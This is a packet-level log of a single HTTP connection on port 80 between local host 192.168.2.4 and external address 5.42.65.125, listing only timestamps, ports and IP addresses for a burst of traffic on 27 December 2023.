Dec 27, 2023 18:12:24.838176012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.840555906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.840567112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.840603113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.840615988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.840626955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.840653896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.840806007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.840817928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.840857983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.841022015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.841058969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.841063976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.841077089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.841089010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.841121912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.841551065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.841563940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.841587067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.841620922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.841636896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.841649055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.841659069 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.841660976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.841696978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.842124939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.842137098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.842164040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.842467070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.842504978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.842504978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.842516899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.842529058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.842565060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.843097925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.843137980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.843142986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.843154907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.843168020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.843202114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.843375921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.843411922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.843462944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.843476057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.843487024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.843497992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.843509912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.843509912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.843534946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.843961954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.843974113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.844011068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.844028950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.844058037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.844065905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.844070911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.844082117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.844101906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.844103098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.844114065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.844135046 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.844860077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.844871998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.844907999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.844928980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.844940901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.844952106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.844968081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.844975948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.844980001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.844991922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.844994068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.845019102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.845731020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.845793009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.845812082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.845824957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.845835924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.845837116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.845849037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.845854044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.845877886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.847311974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.847326994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.847371101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.847390890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.847404957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.847425938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.847450018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.847455025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.847472906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.847585917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.847598076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.847609997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.847620010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.847621918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.847631931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.847642899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.847670078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.847691059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.848309994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.848323107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.848334074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.848345041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.848356962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.848362923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.848367929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.848381042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.848381996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.848392010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.848400116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.848412037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.849927902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.849941015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.849983931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.850070000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.850083113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.850095034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.850106955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.850120068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.850127935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.851948977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.851960897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.851973057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.851984024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.851995945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.852022886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.853137016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.853151083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.853185892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.853245974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.853257895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.853276014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.853282928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.853288889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.853301048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.853311062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.853338957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.853415012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.853456020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.853497028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.853517056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.853564978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.853578091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.853590012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.853600979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.853614092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.853641033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.853678942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.853714943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.853723049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.854386091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.854398012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.854427099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.857857943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.860476017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.860487938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.860507965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.860522032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.860569000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.860596895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.860649109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.860660076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.860696077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.860703945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.860714912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.860733986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.860779047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.860790014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.860814095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.861596107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.861608982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.861620903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.861632109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.861633062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.861671925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.861845970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.861859083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.861896038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.861922026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.861957073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.861999989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.862013102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.862029076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.862040997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.862051964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.862066984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.862092018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.862751961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.862821102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.862833023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.862843990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.862855911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.862858057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.862867117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.862873077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.862891912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.862896919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.862907887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.862932920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.863682032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.863760948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.863773108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.863774061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.863784075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.863837957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.863841057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.863854885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.863866091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.863878012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.863882065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.863918066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.864595890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.864609003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.864619017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.864629030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.864630938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.864643097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.864659071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.864684105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.864702940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.864716053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.864732027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.864754915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.865346909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.865359068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.865395069 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.869848013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.869860888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.869872093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.869884014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.869891882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.869901896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.870038033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.870079041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.870093107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.870141029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.870153904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.870189905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.870419025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.870438099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.870461941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.870503902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.870516062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.870543003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.874711037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.874727011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.874738932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.874767065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.874785900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.874788046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.875227928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.875240088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.875251055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.875262976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.875269890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.875273943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.875283957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.875288010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.875296116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.875307083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.875329971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.875356913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.875917912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.875930071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.875942945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.875953913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.875957966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.875967026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.875978947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.875981092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.875998020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.876010895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.876024008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.876049042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.876915932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.876955032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.876986027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.877074957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.877087116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.877113104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.877137899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.877150059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.877166986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.877172947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.877178907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.877199888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.877585888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.877633095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.877666950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.877671003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.877680063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.877691984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.877705097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.877731085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.877763033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.877774954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.877787113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.877818108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.878500938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.878514051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.878549099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.878566027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.878576994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.878590107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.878598928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.878619909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.878632069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.878633022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.878643990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.878671885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.880037069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.880085945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.880127907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.880143881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.880155087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.880177975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.880229950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.880264997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.880311966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.880323887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.880336046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.880378962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.881558895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.881572008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.881611109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.882049084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.882066965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.882077932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.882090092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.882092953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.882127047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.882252932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.882265091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.882296085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.882297993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.882308960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.882322073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.882330894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.882356882 CET	49738	80	192.168.2.4	5.42.65.125
